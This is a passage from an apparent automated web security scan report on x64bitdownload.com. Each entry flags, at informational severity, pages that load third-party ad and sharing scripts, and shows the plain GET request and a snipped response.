Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1463. http://www.x64bitdownload.com/featured-software.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /featured-software.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /featured-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:32:35 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 29094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1464. http://www.x64bitdownload.com/linktous.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /linktous.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /linktous.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1465. http://www.x64bitdownload.com/new-reviews.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /new-reviews.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /new-reviews.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:26 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1466. http://www.x64bitdownload.com/new-software.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /new-software.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /new-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:21 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 120254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1467. http://www.x64bitdownload.com/saved-software.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /saved-software.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /saved-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28771


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1468. http://www.x64bitdownload.com/screenshot/communitymate-download-qeakzpwv.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/communitymate-download-qeakzpwv.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:14 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8753


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1469. http://www.x64bitdownload.com/screenshot/news-file-grabber-download-stclytop.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/news-file-grabber-download-stclytop.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:29 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 9015


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1470. http://www.x64bitdownload.com/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:34 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 9009


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1471. http://www.x64bitdownload.com/screenshot/ozum-download-lhtivuds.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/ozum-download-lhtivuds.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:52 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8688


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1472. http://www.x64bitdownload.com/screenshot/paragon-extbrowser-download-xwigzbic.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/paragon-extbrowser-download-xwigzbic.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:42 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8524


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1473. http://www.x64bitdownload.com/screenshot/rss-reader-download-avwkinlm.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/rss-reader-download-avwkinlm.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:49 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8570


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1474. http://www.x64bitdownload.com/screenshot/trollkiller-for-firefox-download-ydeukbjf.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:08 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8766


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1475. http://www.x64bitdownload.com/screenshot/usenext-download-rizftkeg.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/usenext-download-rizftkeg.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:15 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8795


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1476. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-ivzgszuq.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/web-forum-reader-download-ivzgszuq.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:36 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8751


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1477. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-sqifmyiy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/web-forum-reader-download-sqifmyiy.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:09 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8751


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1478. http://www.x64bitdownload.com/software-advanced.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /software-advanced.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /software-advanced.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1479. http://www.x64bitdownload.com/submit-pad-file.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /submit-pad-file.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /submit-pad-file.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1480. http://www.x64bitdownload.com/tellafriend.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /tellafriend.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /tellafriend.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1481. http://www.x64bitdownload.com/top-software-downloads.html

Summary

